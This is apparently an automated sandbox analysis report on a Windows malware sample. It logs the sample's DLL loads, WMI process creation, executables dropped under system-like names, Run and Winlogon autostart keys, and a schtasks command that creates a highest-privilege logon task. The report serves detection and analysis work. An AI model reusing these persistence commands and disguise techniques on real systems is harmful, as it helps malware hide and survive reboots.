Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\cvXu2RR10n.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\cvXu2RR10n.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: cvXu2RR10n.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: cvXu2RR10n.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: cvXu2RR10n.exe

Static file information: File size 2691584 > 1048576

Source: cvXu2RR10n.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x28d800

Source: cvXu2RR10n.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: cvXu2RR10n.exe, 00000000.00000002.1327020968.0000000003310000.00000004.08000000.00040000.00000000.sdmp, cvXu2RR10n.exe, 00000000.00000002.1329052019.000000000352D000.00000004.00000800.00020000.00000000.sdmp, ApplicationFrameHost.exe, 00000032.00000002.1437153809.00000000034DF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: cvXu2RR10n.exe, 00000000.00000002.1327020968.0000000003310000.00000004.08000000.00040000.00000000.sdmp, cvXu2RR10n.exe, 00000000.00000002.1329052019.000000000352D000.00000004.00000800.00020000.00000000.sdmp, ApplicationFrameHost.exe, 00000032.00000002.1437153809.00000000034DF000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Code function: 0_2_00007FFAAC463FAA push E9FFFFFDh; retf		0_2_00007FFAAC463FAF
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Code function: 60_2_00007FFAAC463FAA push E9FFFFFDh; retf		60_2_00007FFAAC463FAF

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops executables to the windows directory (C:\Windows) and starts them

Source: unknown	Executable created and started: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe
Source: unknown	Executable created and started: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe

Source: C:\Users\user\Desktop\cvXu2RR10n.exe	File created: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	File created: C:\Recovery\smartscreen.exe	Jump to dropped file
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	File created: C:\Recovery\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	File created: C:\Users\user\Music\ApplicationFrameHost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	File created: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Jump to dropped file
Source: C:\Users\user\Music\ApplicationFrameHost.exe	File created: C:\Users\user\AppData\Local\Temp\13e405ee8ccedfb794a39e44ce97157ba9c943c9.exe	Jump to dropped file

Source: C:\Users\user\Desktop\cvXu2RR10n.exe	File created: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe			Jump to dropped file
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	File created: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe			Jump to dropped file

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Users\user\Desktop\cvXu2RR10n.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vAJjQbsDlJtvByBkfqttADkNAptf

Jump to behavior

Creates an undocumented autostart registry key

Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior

Creates multiple autostart registry keys

Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vAJjQbsDlJtvByBkfqttADkNAptf	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreen	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\cvXu2RR10n.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vAJjQbsDlJtvByBkfqttADkNAptf" /sc ONLOGON /tr "'C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe'" /rl HIGHEST /f

Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vAJjQbsDlJtvByBkfqttADkNAptf	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vAJjQbsDlJtvByBkfqttADkNAptf	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vAJjQbsDlJtvByBkfqttADkNAptf	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vAJjQbsDlJtvByBkfqttADkNAptf	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreen	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreen	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreen	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreen	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vAJjQbsDlJtvByBkfqttADkNAptf	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vAJjQbsDlJtvByBkfqttADkNAptf	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vAJjQbsDlJtvByBkfqttADkNAptf	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vAJjQbsDlJtvByBkfqttADkNAptf	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
